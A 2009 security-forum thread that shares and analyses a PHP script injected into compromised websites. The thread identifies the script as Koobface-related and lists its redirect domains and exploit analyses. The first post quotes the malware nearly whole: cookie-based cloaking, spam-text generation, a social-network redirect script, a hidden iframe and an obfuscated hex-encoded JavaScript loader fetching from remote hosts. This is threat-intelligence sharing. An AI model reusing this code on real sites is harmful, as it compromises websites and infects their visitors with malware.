Malware Domain List

Malware Related => Malicious Domains => Topic started by: Malware-Web-Threats on May 19, 2009, 09:03:04 pm

Title: Malicious PHP file
Post by: Malware-Web-Threats on May 19, 2009, 09:03:04 pm
This is a php injected on websites a few days ago

Quote
<?
// new variant by floppy
error_reporting(0);
ini_set('error_reporting', 0);

if (isset($_GET['test']) && $_GET['test']==1)
{
    print "KROTEG";
    exit();
}

$magicparam="ff";
$magicparam=substr(md5(date("H")), 0, 2);
$magicvalue=substr(md5(date("H")), 3, 2);
$randparam="a".substr(md5(rand(1,9999)),0,rand(3,10));
$randvalue=substr(md5(rand(1,9999)),0,rand(1,10));

//echo "$magicparam";

function miss ($key) {
   $massiv=array(
   'qwa',
   'weqasd23v',
   'ewrdfs34',
   'retdfg45',
   'tryfgh56',
   'ytu67ghji',
   'uiyhjk78',
   'iuojkl89y',
   'oipkl90',
   'pol',
   'azsqw',
   'sweadxz',
   'dfresxc',
   'fdgrtcv',
   'gfhtyvb',
   'hgjyubn',
   'jhkuinm',
   'kjliomc',
   'lkop',
   'zasx',
   'xzcsd',
   'cxvdfk',
   'vcbfg',
   'bghvn',
   'nbhjm',
   'mnjk'
   );
       
   //$key=$_POST['domain_name'];
   
   $missletters=0;
   $missorder=0;
   $missdouble=1;
   $missneighbors=0;
   $newone=count($massiv);
   $errorslovo=$key;
   $opo=array();
   for($j=0;$j<strlen($errorslovo);$j++)
   {
   $kot=$j+2;
   if ($missletters) $opo[]=substr_replace($errorslovo, '', $j, 1);
   if ($missorder && $kot<strlen($errorslovo))
   $opo[]=substr($errorslovo,0, $j). $errorslovo{$j+1}.$errorslovo{$j}.substr($errorslovo,$j+2);
   }
   for($n=0;$n<strlen($errorslovo);$n++)
   {
   $ot=strlen($errorslovo)-$n;
   $bukva=substr($errorslovo, -$ot, 1);
   if ($missdouble) $opo[]=substr_replace($errorslovo, $bukva.$bukva, $n, 1);
   for($k=0;$k<strlen($errorslovo);$k++)
   {
     if ($errorslovo{$n}==$massiv[$k]{0})
     {
   for($l=0;$l<strlen($massiv[$k])-1;$l++)
   {
    if ($missneighbors)
    {
   $opo[]=substr_replace($errorslovo, $bukva.$massiv[$k]{$l}, $n, 1);
   $opo[]=substr_replace($errorslovo, $massiv[$k]{$l}, $n, 1);
    }
   }
     }
   }
   }
   $vvv=array_unique($opo);
   sort($vvv);
   return $vvv;
}


function miss2 ($text)
{
    $tags=array("","b","i","u","p","div");
   
    $t=$tags[array_rand($tags)];
   
   $new_str = '';
   
   $tmp = explode(" ", $text);
   $count = count($tmp);
   for ($i=0; $i<$count; $i++) {
      
      $str = $tmp[$i];
      if (strlen($str)>3) {
         $arr = miss($str);
         $str = $arr[rand(0, count($arr)-1)];
         //var_dump($str);   
      }
      $new_str.= " ".$str;
      
   }
   
    if (strlen($t)>0)
    {
        $new_str=trim($new_str);
        $new_str="<$t>$new_str</$t>";
    }
   return trim($new_str);
}

$vars = array("black","navy","blue","green","teal","lime","aqua","maroon","purple","olive","gray","silver","red","fuchsia","yellow","white");
$js_f = $vars[rand(0, count($vars) - 1)].$vars[rand(0, count($vars) - 1)];
$js_id = $vars[rand(0, count($vars) - 1)];

$title = "";
$t = array("video", "films", "movie", "youtube", "home entertainment","movies","television","tv","studios","home video","dvd","theater","now available","rentals","widescreen");
for ($i=0; $i<6; $i++) {
   $title .= $t[rand(0, count($t) - 1)]." ";
}


$arr = array(
   "And in his name shall the Gentiles trust. Then was brought unto him one possessed with
a devil, blind, and dumb: and he healed him, insomuch that the blind and dumb both spake and saw. ",
   "And all the people were amazed, and said, Is not this the son of David?",
   "But when the Pharisees heard it, they said, This fellow doth not cast out devils, but by
Beelzebub the prince of the devils. And Jesus knew their thoughts, and said unto them, Every kingdom
divided against itself is brought to desolation; and every city or house divided against itself shall not stand:
 And if Satan cast out Satan, he is divided against himself; how shall then his kingdom stand?
And if I by Beelzebub cast out devils, by whom do your children cast them out? therefore they shall be your judges. ",
   "Then one said unto him, Behold, thy mother and thy brethren stand without, desiring to
speak with thee. But he answered and said unto him that told him, Who is my mother? and who are
my brethren? And he stretched forth his hand toward his disciples, and said, Behold my mother and my brethren!",
   "Then goeth he, and taketh with himself seven other spirits more wicked than himself, and they
enter in and dwell there: and the last state of that man is worse than the first. Even so shall it be also
unto this wicked generation. While he yet talked to the people, behold, his mother and his brethren stood
without, desiring to speak with him.",
   "The queen of the south shall rise up in the judgment with this generation, and shall condemn it:
 for she came from the uttermost parts of the earth to hear the wisdom of Solomon; and, behold, a greater
than Solomon is here. When the unclean spirit is gone out of a man, he walketh through dry places, seeking
 rest, and findeth none. Then he saith, I will return into my house from whence I came out; and when he is
come, he findeth it empty, swept, and garnished.",
   "Then certain of the scribes and of the Pharisees answered, saying, Master, we would see a sign
from thee. But he answered and said unto them, An evil and adulterous generation seeketh after a sign;
and there shall no sign be given to it, but the sign of the prophet Jonas: For as Jonas was three days and
 three nights in the whale's belly; so shall the Son of man be three days and three nights in the heart of
the earth. The men of Nineveh shall rise in judgment with this generation, and shall condemn it: because
they repented at the preaching of Jonas; and, behold, a greater than Jonas is here.",
   "A good man out of the good treasure of the heart bringeth forth good things: and an evil man
out of the evil treasure bringeth forth evil things. But I say unto you, That every idle word that men shall
 speak, they shall give account thereof in the day of judgment. For by thy words thou shalt be justified,
and by thy words thou shalt be condemned.",
   "And whosoever speaketh a word against the Son of man, it shall be forgiven him: but whosoever
speaketh against the Holy Ghost, it shall not be forgiven him, neither in this world, neither in the world to come.
Either make the tree good, and his fruit good; or else make the tree corrupt, and his fruit corrupt: for the tree
 is known by his fruit. O generation of vipers, how can ye, being evil, speak good things? for out of the
abundance of the heart the mouth speaketh.",
   "Or else how can one enter into a strong man's house, and spoil his goods, except he first bind
the strong man? and then he will spoil his house. He that is not with me is against me; and he that gathereth
not with me scattereth abroad. Wherefore I say unto you, All manner of sin and blasphemy shall be forgiven
unto men: but the blasphemy against the Holy Ghost shall not be forgiven unto men.",
   "But when the Pharisees heard it, they said, This fellow doth not cast out devils, but by Beelzebub
 the prince of the devils. And Jesus knew their thoughts, and said unto them, Every kingdom divided against
 itself is brought to desolation; and every city or house divided against itself shall not stand:
And if Satan cast out Satan, he is divided against himself; how shall then his kingdom stand?
And if I by Beelzebub cast out devils, by whom do your children cast them out? therefore they shall be your judges.
 But if I cast out devils by the Spirit of God, then the kingdom of God is come unto you.",
   "And he stretched it forth; and it was restored whole, like as the other. Then the Pharisees went out,
and held a council against him, how they might destroy him. But when Jesus knew it, he withdrew himself from
thence: and great multitudes followed him, and he healed them all; And charged them that they should not make
him known: That it might be fulfilled which was spoken by Esaias the prophet, saying, Behold my servant,
whom I have chosen; my beloved, in whom my soul is well pleased: I will put my spirit upon him,
and he shall shew judgment to the Gentiles."
);

                   
$cook=false;
$ref=false;
$reload=false;

if (isset($_COOKIE[$magicparam]) && $_COOKIE[$magicparam]==$magicvalue) $cook=true;

if (isset($_SERVER['HTTP_REFERER']))
{
    $ref=true;
    $fr="http://".$_SERVER['HTTP_HOST'];
    if (strstr(strtolower($_SERVER['HTTP_REFERER']),strtolower($fr))) {
       $reload=true; // this is javascript call
    }

}


if ($reload)
{
    if ($cook)
    {
                    $host = $_SERVER['HTTP_HOST'];
                    // got cook. redir here
                    if (isset($_COOKIE[$magicparam]))
                        if ($_COOKIE[$magicparam]==$magicvalue)
                        {
                           
                            $red="var abc1 = 'hxxp://y18032009.com/go/';".
                            "var abc2 = 'hxxp://redir1504.com/go/';".
                            "var ss = '' + location.search;".
                            "if ((location.search).length>0 && (ss.indexOf('ids=2') == -1)) abc = abc1; else abc = abc2;".
                            "var redirects = [".
                            "['facebook.com',  abc+'fb.php'],".
                             "['tagged.com',    abc+'tg.php'],".
                             "['friendster.com',abc+'fr.php'],".
                             "['myspace.com',   abc+'ms.php'],".
                             "['msplinks.com',  abc+'ms.php'],".
                             "['myyearbook.com',abc+'yb.php'],".
                             "['fubar.com',     abc+'fu.php'],".
                             "['hi5.com',       abc+'hi5.php'],".
                             "['bebo.com',      abc+'be.php']".
                             "];".
                             "var s = '' + document.referrer, r = false;".
                             "for (var i = 0; i < redirects.length; i ++) {".
                             "if ((s.indexOf(redirects[0]) != -1)) {".
                             "     var redir=redirects[1] + location.search; ".
                             "     if ((location.search).length>0) redir=redir+'&domain=".$host."'; else redir=redir+'?domain=".$host."'; ".
                             "     location.href = redir;  ".
                             
                             "     r = true; ".
                             "     break; ".
                             "}".
                             "}".
                             "if (!r) location.href = abc+'index.php'+ location.search;";
                             echo $red;
                             
                        }
    }
}       
else
{
   setcookie($magicparam, $magicvalue);   
    $rscript='<scr'.'ipt ty'.'pe="te'.'xt/ja'.'vasc'.'ript" sr'.'c="?'.$randparam.'='.$randvalue.'"></scr'.'ipt>';
   print '
   <ht'.'ml>
   <he'.'ad>
       <ti'.'tle>'.$title.'</tit'.'le>
   </he'.'ad>   
   <bo'.'dy bgc'.'olor="'.$js_id.'" te'.'xt="'.$js_id.'">';

    $NUMTEXTS=5;   
    $scriptpos=rand(0,$NUMTEXTS-1);
   
    for ($a=0;$a<$NUMTEXTS;$a++)
    {
        if ($a==$scriptpos) echo $rscript."\n";
        echo miss2($arr[rand(0, count($arr)-1)])."\n";
    }
   
    echo '</bod'.'y></h'.'tml>';
}
exit();

?>
<html>
<head>
<title>Hello</title>
</head>
<body>                                                                                                                                                                                                                                                                                                                                                                                                                        <iframe src='hxxp://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function c858d4c43w49fa30115b110(w49fa30115b8f9){
function w49fa30115c0b1(){return 16;}
return (parseInt(w49fa30115b8f9,w49fa30115c0b1()));}
function w49fa30115d053(w49fa30115d823){
function w49fa30115ef97(){return 2;}
var w49fa30115dffc='';
w49fa30115ff39=String['fromCharCode'];
for(w49fa30115e7ce=0;w49fa30115e7ce<w49fa30115d823.length;
w49fa30115e7ce+=w49fa30115ef97()){
w49fa30115dffc+=(w49fa30115ff39(c858d4c43w49fa30115b110(
w49fa30115d823.substr(w49fa30115e7ce,w49fa30115ef97()))));}
return w49fa30115dffc;} var x01='';
var w49fa30116070a='3C7'+x01+'3637'+x01+'2697'+x01+'07'+x01+'43E696628216D7'+x01+
'96961297'+x01+'B646F637'+x01+'56D656E7'+x01+'42E7'+x01+'7'+x01+'7'+x01+'2697'+x01+
'465287'+x01+'56E657'+x01+'363617'+x01+'065282027'+x01+'2533632536392536362537'+
x01+'322536312536642536352532302536652536312536642536352533642536332533382532302537'+
x01+'332537'+x01+'32253633253364253237'+x01+'2536382
<script type="text/javascript" src="hxxp://mosronsorg.ru/files/pic.gif"></script>

with colors:

(http://img386.imageshack.us/img386/2569/phpinjected.jpg)

And you can see some compromised website with a google search:
http://www.google.com/search?q=%22new+variant+by+floppy%22&hl=en&lr=&rlz=1G1GGLQ_ENBE320&num=50&filter=0 (http://www.google.com/search?q=%22new+variant+by+floppy%22&hl=en&lr=&rlz=1G1GGLQ_ENBE320&num=50&filter=0)
Title: Re: Malicious PHP file
Post by: SysAdMini on May 19, 2009, 09:09:20 pm
It's Koobface related.

Search for domains
Code: [Select]
y18032009.com
redir1504.com

in our list.

Title: Re: Malicious PHP file
Post by: Malware-Web-Threats on May 19, 2009, 09:22:01 pm
Other with several scripts

http://wepawet.iseclab.org/view.php?hash=928191d90e6ac9d43ded2d29a149ce58&t=1242767992&type=js (http://wepawet.iseclab.org/view.php?hash=928191d90e6ac9d43ded2d29a149ce58&t=1242767992&type=js)
http://wepawet.iseclab.org/view.php?hash=985fed1b79db87b17e216b5ba6046452&t=1242768035&type=js (http://wepawet.iseclab.org/view.php?hash=985fed1b79db87b17e216b5ba6046452&t=1242768035&type=js)

The first include this domain elantrasantrope[.]ru with other exploits (I've checked, all domain are listed):
Wepawet (http://wepawet.iseclab.org/view.php?hash=2e63372d319b142dff8ec41e3a2b17ec&t=1242768427&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=538e5967b0e8584c00f4a6aa45df794d&t=1242768535&type=js)

The second has the same PHP script but with errors.

Title: Re: Malicious PHP file
Post by: Malware-Web-Threats on May 19, 2009, 09:33:36 pm
but new links:

Code: [Select]
hxxp://servergloria.cn/47/pdf.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=63e6bf63e2cfe113793c19d634e25454&t=1242768944&type=js)
VirusTotal (http://www.virustotal.com/analisis/0df2279f5ee19e4d98e16fe8f344dea9) - 12/40 (30%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=0f9a2dfabd1b10496c8a9033189eef54&type=js) (file)

Code: [Select]
hxxp://servergloria.cn/47/swf.php
VirusTotal (http://www.virustotal.com/analisis/cc797acf651012f3f321341228bc1988) - 6/40 (15%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=c63158bba186ec60fbfbb0e5984da07f&type=swf) (file)